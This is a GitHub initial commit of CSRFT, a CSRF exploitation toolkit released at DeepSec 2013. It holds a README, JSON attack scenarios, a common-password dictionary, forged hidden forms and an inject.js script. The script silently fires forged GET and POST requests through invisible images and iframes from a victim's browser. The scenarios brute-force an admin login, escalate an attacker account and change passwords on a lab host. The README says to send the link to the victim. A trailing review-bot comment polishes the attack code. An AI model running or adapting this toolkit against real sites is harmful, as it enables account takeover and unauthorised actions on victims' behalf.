
First commit for the official release of CSRFT, DeepSec, 2013.

0 parents commit a6f80413ef37f4d78b7738b91dcc27aa409b4146 @PaulSec committed Nov 22, 2013
@@ -0,0 +1,31 @@
+CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit
+
+This project has been developed for exploiting CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit.
+
+This project allows you to perform PoC (Proof Of Concepts) really easily. <br />
+For launching the project, you just need to do :
+
+<code>node server.js <conf file> <port, default: 8080></code>
+
+The server will be launched on the port 8080, so you can access it via : <code>http://0.0.0.0:8080 </code>.
+The file.json must be in the conf/ folder and describe your several attack scenarios.
+
+The index page displayed on the browser is accessible via : <code>/views/index.ejs</code>. <br />
+You can change it as you want and give the link to your victim.
+
+* Conf folder : add your audit.json file with your configuration. <br />
+* Exploits folder : add all your *.html files containing your forms (use form_creator or form_dumper if needed (See GitHub account : PaulSec)) <br />
+* public folder : containing js folder, jquery and inject.js (script loaded when accessing 0.0.0.0:8888)
+* views folder : index file and exploit template
+* server.js file - the HTTP server
+
+### Use case :
+
+If you want to perform a simple & fast exploitation of CSRF vulnerabilities, here are the steps to reproduce :
+
+1) Create your configuration file, see samples in conf/ folder<br />
+2) Add your *.html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable<br />
+3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,<br />
+4) Replace the value of the field you want to perform this attack with the token '<%value%>' (without the single quote)<br />
+ => either in your urls if GET exploitation, or in the HTML files if POST exploitation. <br />
+5) Launch the application !<br />
@@ -0,0 +1,37 @@
+{
+ "audit": {
+ "name": "Deepsec Change Password",
+
+ "scenario": [
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/edit"
+ }
+ ]
+ },
+ {
+ "attack": [
+
+ {
+ "method": "POST",
+ "type_attack": "dico",
+ "file": "numbers_0_to_20.txt",
+ "form": "deepsec_form_change_password.html"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout"
+ }
+ ]
+ }
+ ]
+ }
+}
@@ -0,0 +1,39 @@
+{
+ "audit": {
+ "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",
+
+ "scenario": [
+ {
+ "attack": [
+ {
+ "method": "POST",
+ "type_attack": "dico",
+ "file": "passwords.txt",
+ "form": "deepsec_form_log_user.html",
+ "comment": "attempt to connect the admin with a list of selected passwords"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
+ "comment": "then, after the login session, we expect the admin to be logged in, attempt to get upgrade our account"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
+ "comment": "The final step is to logout the admin"
+ }
+ ]
+ }
+ ]
+ }
+}
@@ -0,0 +1,20 @@
+1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
@@ -0,0 +1,26 @@
+password
+123456
+12345678
+abc123
+qwerty
+monkey
+letmein
+dragon
+111111
+baseball
+iloveyou
+trustno1
+1234567
+sunshine
+master
+123123
+welcome
+shadow
+ashley
+football
+jesus
+michael
+ninja
+mustang
+password1
+admin
@@ -0,0 +1,4 @@
+<form id="form-attaque" action="http://192.168.56.1/vuln-website/index.php/welcome/edit" method="POST">
+<input type="password" class="input-block-level" placeholder="Password" name="password" value="deepsecrocks">
+<input type="text" class="input-block-level" name="result" value="<%value%>">
+</form>
@@ -0,0 +1,4 @@
+<form action="http://192.168.56.1/vuln-website/index.php/welcome/login" method="POST">
+<input type="text" class="input-block-level" placeholder="Username" name="username" value="admin">
+<input type="password" class="input-block-level" placeholder="Password" name="password" value="<%value%>">
+</form>
@@ -0,0 +1,35 @@
+function insert_attacks_in_dom(data) {
+ for (index in data) {
+ // alert(data[attack].method);
+ var attack = data[index];
+ if (attack.method == "GET") {
+ // GET method (use img)
+ $('#attack').append('<img src="' + attack.url + '" height=0 width=0>');
+ } else {
+ // POST method (use iframe)
+ $('#attack').append('<iframe src="' + /payload/ + attack.num_scenario + '/' + attack.num_attack + '/' + attack.val + '" height=0 width=0>');
+ }
+ }
+}
+
+$(document).ready(function() {
+
+ setInterval(function() {
+
+ $.getJSON('exploit', function(data) {
+ // if result
+ if (data.length > 0) {
+
+ // insert a div in body
+ $('body').append('<div id="attack"></div>');
+ insert_attacks_in_dom(data);
+ }
+ });
+
+ // remove the div for the attack.
+ $('#attack').remove();
+
+ }, 10000);
+
+
+});
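Review bot: `for (index in data)` at the top of insert_attacks_in_dom never declares `index`, so it becomes an implicit global, and `for...in` over the JSON array also walks any enumerable properties added to Array.prototype rather than just the elements; `for (const attack of data) { ... }` (dropping the `var attack = data[index];` line) iterates only the array's values. In the POST branch, `/payload/` is a RegExp literal, not a string, and only produces the intended path because `+` coerces it to `"/payload/"` — writing `'/payload/'` makes the intent explicit and avoids a lint error. The `attack.method == "GET"` comparison should be `===` to match the strict-equality style used elsewhere in the project. In the ready handler, `$('#attack').remove()` runs synchronously at the start of each 10 s tick, before the asynchronous `getJSON` callback appends the new div, so a div appended by one poll is only removed at the next tick; if that lifetime is intentional, a comment saying so (`// the div from the previous poll lives until this tick`) would save the next reader from assuming it is a race.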
